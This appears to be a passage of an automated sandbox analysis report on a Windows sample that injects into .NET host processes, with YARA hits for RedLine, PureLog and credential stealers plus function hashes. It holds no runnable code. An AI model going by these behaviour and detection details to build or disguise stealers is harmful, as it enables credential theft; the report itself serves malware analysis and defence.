6f Data Ascii: ]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3vX)MD0o
2024-04-20 11:23:23 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 11:23:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e83191q76f44keokvg6og8872p; expires=Wed, 14-Aug-2024 05:10:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZ0rd09jw%2BJgf4kJ04BWhb8nyS9vnf2yS70w06otxeoBPLGgC2nLOEarL40nu3sJUBvdVHzFF2GrvWN0i5qtz2X0zj%2BvuJXJ9cd1Bq%2BBqHDXitmOzeNryi1rwIhJvw3ADyhQXvw1%2B2U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8774c307c9636743-ATL alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	13:21:58
Start date:	20/04/2024
Path:	C:\Users\user\Desktop\2M1NS61GG8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2M1NS61GG8.exe"
Imagebase:	0x350000
File size:	5'382'656 bytes
MD5 hash:	C7EEA9D0D8F7BF74BD7C25990458BCF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:22:02
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x300000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:22:05
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x310000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:22:08
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x560000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000004.00000002.2512707463.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000004.00000002.2478930846.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:22:40
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x650000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:22:46
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x880000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:23:19
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.4%
Total number of Nodes:	221
Total number of Limit Nodes:	10

Executed Functions

Function 083D7BF0 Relevance: 6.9, Strings: 5, Instructions: 626
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 083D8BC8
Hbq, xrefs: 083D8A81
Hbq, xrefs: 083D89FA
Hbq, xrefs: 083D8B0B
Hbq, xrefs: 083D8967

Memory Dump Source

Source File: 00000000.00000002.2438658006.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_83d0000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 22d4adad9901f19d75181735ceddd33d4d999bef2a6844085e22acadafb30e80
Instruction ID: 22af946de2a938183ba50a340995c12c3eb23156ec4e85df57c6edeaaf41c037
Opcode Fuzzy Hash: 22d4adad9901f19d75181735ceddd33d4d999bef2a6844085e22acadafb30e80
Instruction Fuzzy Hash: 15326F31A002588FDB54DF78D8907AEBBF6BFC4301F14896AD409AB395DB34AD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08D160B0 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#)h, xrefs: 08D1634D
#)h, xrefs: 08D16354
Te^q, xrefs: 08D1610B
Te^q, xrefs: 08D163B3

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: #)h$#)h$Te^q$Te^q
API String ID: 0-3673451357
Opcode ID: 91fa08b2d865e4376f9271221b3621018d4e7e791f3355f72c0beea2a4db7e7c
Instruction ID: 90b99ecf891cd49b2f7d84a2bb27fea1578a3b1f77afe8e001267c0d99e337f4
Opcode Fuzzy Hash: 91fa08b2d865e4376f9271221b3621018d4e7e791f3355f72c0beea2a4db7e7c
Instruction Fuzzy Hash: A4B1F0B4E152199FCF08CFA9D9809AEFBF2FF88311F208629D406AB355D734A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 08D16007 Relevance: 4.1, Strings: 3, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#)h, xrefs: 08D16354
Te^q, xrefs: 08D1610B
Te^q, xrefs: 08D163B3

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: #)h$Te^q$Te^q
API String ID: 0-4151090002
Opcode ID: 1d0af9ced7a59d6a503a90a9bdcb4fa559fec0399badf2506a9f4e6b9232a4ed
Instruction ID: f4989baa146e388f6ebc3387fcd631d6721c3b28b0c84a21fc1ec905fea9adda
Opcode Fuzzy Hash: 1d0af9ced7a59d6a503a90a9bdcb4fa559fec0399badf2506a9f4e6b9232a4ed
Instruction Fuzzy Hash: 10D15771A05618DFCB08CFA5E8815EEFBF2FF89310F15816AE406AB261C7319942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 08D16061 Relevance: 4.0, Strings: 3, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#)h, xrefs: 08D16354
Te^q, xrefs: 08D1610B
Te^q, xrefs: 08D163B3

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: #)h$Te^q$Te^q
API String ID: 0-4151090002
Opcode ID: db764e82d7a62e1fcf85659e3f884c0632d826e5f98be3403b507ecd7d1f8e5b
Instruction ID: 38a839a440c1b6be6b7604f540edfe3a42139c681b3a51c1513921cf0f178916
Opcode Fuzzy Hash: db764e82d7a62e1fcf85659e3f884c0632d826e5f98be3403b507ecd7d1f8e5b
Instruction Fuzzy Hash: B9C12374E056199FCF08CFA9D9809DEFBF2FF89310F20866AE406AB255D7319941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02F74A68 Relevance: 3.9, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8K6;, xrefs: 02F74BF9
8K6;, xrefs: 02F74C00
T2D8, xrefs: 02F74B1E

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: 8K6;$8K6;$T2D8
API String ID: 0-174012540
Opcode ID: a8d2f814a3401d97de5f5212b18ce69e74df505b8908cc4c5b4d1b03a851fa73
Instruction ID: 791b8da2084363e6ab57b4b24712603a660771b3510670933305b110a2b12b05
Opcode Fuzzy Hash: a8d2f814a3401d97de5f5212b18ce69e74df505b8908cc4c5b4d1b03a851fa73
Instruction Fuzzy Hash: 765145B4E046198FDB08CFAAD8806AEFBF2FF89340F24D06AD509A7254D7345A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0E74F750 Relevance: 3.9, Strings: 3, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8K6;, xrefs: 0E74F8D1
8K6;, xrefs: 0E74F8D8
T2D8, xrefs: 0E74F7F6

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: 8K6;$8K6;$T2D8
API String ID: 0-174012540
Opcode ID: 1b15808036f3f16982c2c79e35125e39d6b60f76b2bfb8df4d568f97326baf5e
Instruction ID: 4bbfc1c109c7637bf6ce2f6484a145388e9dade6b8b88e7d8158eb9ae6414156
Opcode Fuzzy Hash: 1b15808036f3f16982c2c79e35125e39d6b60f76b2bfb8df4d568f97326baf5e
Instruction Fuzzy Hash: 055118B4E056198FDB08CFAAD5406AEFBF2FF88300F64D06AD415B7264D7385A418F64

Uniqueness

Uniqueness Score: -1.00%

Function 02F7414B Relevance: 2.7, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02F74259
Te^q, xrefs: 02F74435

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 5c1f733d5043119a126ec35f2e9ccb8ebf94fbf25c607356144c54bc840efd5d
Instruction ID: 33cebf12b8cb8ebac3ebda376119f04b9d0799380548871088cdbb3303ed4239
Opcode Fuzzy Hash: 5c1f733d5043119a126ec35f2e9ccb8ebf94fbf25c607356144c54bc840efd5d
Instruction Fuzzy Hash: E5B12475E0420A9FDB09CFA9C98469EFBF2FF8A340F24846AD915AB258D7305942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 08D10DE8 Relevance: 2.7, Strings: 2, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 08D10ECF
Hbq, xrefs: 08D10F02

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 7e78fa1b2506d2513ad2c907a77c306108dd6e61d7231e2667a5fae5feb11aae
Instruction ID: dc8fa914dfd3b8485644c02f79830670781b72206d1228f578a4e71368670311
Opcode Fuzzy Hash: 7e78fa1b2506d2513ad2c907a77c306108dd6e61d7231e2667a5fae5feb11aae
Instruction Fuzzy Hash: A6911A71E006589BEB59DF6BD84079EBAF7BFC9240F04C5AAD808AB254DB344982CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0E741650 Relevance: 2.7, Strings: 2, Instructions: 233COMMON

Download Yara Rule

Strings

w:, xrefs: 0E7416A3
8rq|, xrefs: 0E74192D

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: 8rq|$w:
API String ID: 0-477469391
Opcode ID: 878bdc7b202e2a31e939bc542440f6475d1175ea9582c46af6cb3c4ed6844259
Instruction ID: 9142d0320f90fc4cee848e9d6b7bdc300cce1c854137d110562ddf2db6a607fb
Opcode Fuzzy Hash: 878bdc7b202e2a31e939bc542440f6475d1175ea9582c46af6cb3c4ed6844259
Instruction Fuzzy Hash: 71A156B4E15209CFCB04EFA9E9445AEBBB2FF89300F60952AD405BB314EB349945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0E74164E Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

w:, xrefs: 0E7416A3
8rq|, xrefs: 0E74192D

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: 8rq|$w:
API String ID: 0-477469391
Opcode ID: 6a293eed2e9dfdc1bffa8909e70eef08ca4421335e57d9b8bb389d2edd3ab517
Instruction ID: f5d513d97305a49b8bb0a04378c36a143edfeeea63404b217e02561a62d043a3
Opcode Fuzzy Hash: 6a293eed2e9dfdc1bffa8909e70eef08ca4421335e57d9b8bb389d2edd3ab517
Instruction Fuzzy Hash: B79157B4E152099FCB04EFA9E9445AEBBB2FF89300F60952AD405BB314EB349945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0E79FB90 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0E79FDD5
Te^q, xrefs: 0E79FBF9

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 276bd41515eac2640f97b833038f4b848131495cc1b5faa1f204ef8061dd6e77
Instruction ID: 6d27a140d1849bc9ca87cbda99f6d92a6ca31bb82030688eccb5ad8626963fc1
Opcode Fuzzy Hash: 276bd41515eac2640f97b833038f4b848131495cc1b5faa1f204ef8061dd6e77
Instruction Fuzzy Hash: CA91C474E012098FDB08CFAAD9846EEFBB2FF89310F24942AD915BB264D7349945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02F741F0 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02F74259
Te^q, xrefs: 02F74435

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: d4d5e14078a4766a92bda9ec6cc8631eab918eb4ee386823febedacbd3696ad2
Instruction ID: 8819966d7ca2445862e8d8d54ec92be9551f3d3117a7d81ea72cc3bda4bbe85e
Opcode Fuzzy Hash: d4d5e14078a4766a92bda9ec6cc8631eab918eb4ee386823febedacbd3696ad2
Instruction Fuzzy Hash: 6691D474E002199FCB08CFE9C9846DEFBB2FF99350F20942AD915AB268D7305905CF64

Uniqueness

Uniqueness Score: -1.00%

Function 083D2D20 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

PH^q, xrefs: 083D2FA2
PH^q, xrefs: 083D2F62

Memory Dump Source

Source File: 00000000.00000002.2438658006.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_83d0000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 5989668525bc4cdeb89be8f0d0ac94fba0e3ec232d7d8ab829792055e39a1786
Instruction ID: 118045d6e4e8db458c8edc281557999c5194d1e5e5cacfa403ca2945059d8811
Opcode Fuzzy Hash: 5989668525bc4cdeb89be8f0d0ac94fba0e3ec232d7d8ab829792055e39a1786
Instruction Fuzzy Hash: 59811475E04348CFCB14CFA9E59469EFBF6BF89301F10942AD426AB258DBB06946CF14

Uniqueness

Uniqueness Score: -1.00%

Function 084969D7 Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

v\f, xrefs: 08496AC8
$^q, xrefs: 08496A71

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: $^q$v\f
API String ID: 0-3420999202
Opcode ID: 809afdf2e2a915fde51d3a063a1e86a79c6354f90b7f5e500e4fa83b394207c0
Instruction ID: e60974d0351eb9dbc752a346184dca8b1253cd09cc0d950a38b1e6b85ca3eac0
Opcode Fuzzy Hash: 809afdf2e2a915fde51d3a063a1e86a79c6354f90b7f5e500e4fa83b394207c0
Instruction Fuzzy Hash: FC61E278E002089FCB08DFA5D9946AEFBF2FF99301F24846AD906A7354EB705946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 084969E8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

v\f, xrefs: 08496AC8
$^q, xrefs: 08496A71

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: $^q$v\f
API String ID: 0-3420999202
Opcode ID: 16e97852b75e97efeccd013623dd07c3d89e870bc1a91d301279db579d0ad637
Instruction ID: 6258fb76ff0962e6602bc8fac042b740b508c00850b4061c0f988d14327ddb00
Opcode Fuzzy Hash: 16e97852b75e97efeccd013623dd07c3d89e870bc1a91d301279db579d0ad637
Instruction Fuzzy Hash: AF61D178E40218DFCB08DFA5D99469EBBB2FF98301F20842AD906A7354EB705946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0E77B648 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

_2W, xrefs: 0E77B7FA
vOV, xrefs: 0E77B792

Memory Dump Source

Source File: 00000000.00000002.2448806514.000000000E770000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e770000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: _2W$vOV
API String ID: 0-849467474
Opcode ID: 8ca1047dc1e0e14b9837034cddb7e7d995223a63c174ed48faf77a19370ee72b
Instruction ID: 5efc12ede4a8de750fcc93887b29a009220005f4311fd0751c6703cedb13639a
Opcode Fuzzy Hash: 8ca1047dc1e0e14b9837034cddb7e7d995223a63c174ed48faf77a19370ee72b
Instruction Fuzzy Hash: FF513770E0A6099BDF04CFA6D9406EEFBB2BF88300F50D52AD515F7268E7389A118F54

Uniqueness

Uniqueness Score: -1.00%

Function 02F7DBF0 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

XrB, xrefs: 02F7DD8F
XrB, xrefs: 02F7DD81

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: XrB$XrB
API String ID: 0-1305315338
Opcode ID: c12d348c42b7df50ce913f6dfbdd1843cb61be15034a667d225e1ccfa32a8c66
Instruction ID: 8d98d10681363587fc5a2245ff2e678e241bae7334d2f9b3a3f8ce6b1c0ab281
Opcode Fuzzy Hash: c12d348c42b7df50ce913f6dfbdd1843cb61be15034a667d225e1ccfa32a8c66
Instruction Fuzzy Hash: 6B518AB1E0520ECBCB04CFA6D541AEEFBB1AF89340F54942AD212B7214D7B89601CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 08498851 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

~Ho, xrefs: 084989E1
XrB, xrefs: 084989FF

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: ~Ho$XrB
API String ID: 0-3901147761
Opcode ID: 712be3f1bd1331aabb6636261f1f3fef41bc2c1392e5f0b00b1da9c8b37f1704
Instruction ID: 830caa00d5ca90e7f8b83f87bbed8c9336a0028933316eefbf6f7b7ba1fef9f7
Opcode Fuzzy Hash: 712be3f1bd1331aabb6636261f1f3fef41bc2c1392e5f0b00b1da9c8b37f1704
Instruction Fuzzy Hash: 9A517774D0520ADFCF14CFAAD841AAEFFF2AF8A201F14942AD051A7254D7388602CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08498860 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

XrB, xrefs: 084989F1
XrB, xrefs: 084989FF

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: XrB$XrB
API String ID: 0-1305315338
Opcode ID: 620a1f09775aaccf585955fe66141509c5e5cb1390749f25512bf9ef16b84a5f
Instruction ID: 764db0a172462817c3874062c55dd5557e9939bba5a95059ce5d8a8637c32aff
Opcode Fuzzy Hash: 620a1f09775aaccf585955fe66141509c5e5cb1390749f25512bf9ef16b84a5f
Instruction Fuzzy Hash: 3A518670D1520ADBCF18CFAAD941AAEFFF1AF8A311F10942AD051B7254C7788602CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 083D1FF8 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 083D2163

Memory Dump Source

Source File: 00000000.00000002.2438658006.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_83d0000_2M1NS61GG8.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 099c6f5192a73d2eb7b4062afc8d3a39d43f15829e08f810d27a83eebca02e6b
Instruction ID: 7eb165f62b9825754155d2e1d52bbe0991fc7c940045e31481b77d928a4712f0
Opcode Fuzzy Hash: 099c6f5192a73d2eb7b4062afc8d3a39d43f15829e08f810d27a83eebca02e6b
Instruction Fuzzy Hash: 21510A71900229DFDB24CF59D840BDEBBB5BF88314F0484AAE918B7250DB75AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 08D18208 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

jSX., xrefs: 08D183DB

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: jSX.
API String ID: 0-3046212097
Opcode ID: 3a839ca2fc069134aa7fad42c55ffd7b9c800bd08d6d688f220223f2297a8c65
Instruction ID: 5fe6ea0ae6c33405457aa1e465936971536cca46a89afa731481b7fbb439b7e2
Opcode Fuzzy Hash: 3a839ca2fc069134aa7fad42c55ffd7b9c800bd08d6d688f220223f2297a8c65
Instruction Fuzzy Hash: F7C14870E0560AEFCB44CF99D4818AEFBB2FF89342B209569D416AB214D734DA42DF94

Uniqueness

Uniqueness Score: -1.00%

Function 08D14329 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

<, xrefs: 08D145B5

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: a8ab6889c173429d19def5ac44dbdedecc4b8dc4fa87c13f2cac616d403bb6ed
Instruction ID: 671089e14d15fa2122acf330c9f67ac86ad26ffdaf19f353a334d90b32afedd2
Opcode Fuzzy Hash: a8ab6889c173429d19def5ac44dbdedecc4b8dc4fa87c13f2cac616d403bb6ed
Instruction Fuzzy Hash: 29B14971900B54DFDB5ACF69C845189BFB2BF8A300F8A81E9C44A9F2B5D7304985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 08D14353 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

<, xrefs: 08D145B5

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 73334d7a5d4f8dadb03adee975594dea9832521623d0b39066e6460009ce7e0a
Instruction ID: 852cdc140cac5ee11f74c40ee43ea28fed61aae02e57904284cc2ae7ab238a12
Opcode Fuzzy Hash: 73334d7a5d4f8dadb03adee975594dea9832521623d0b39066e6460009ce7e0a
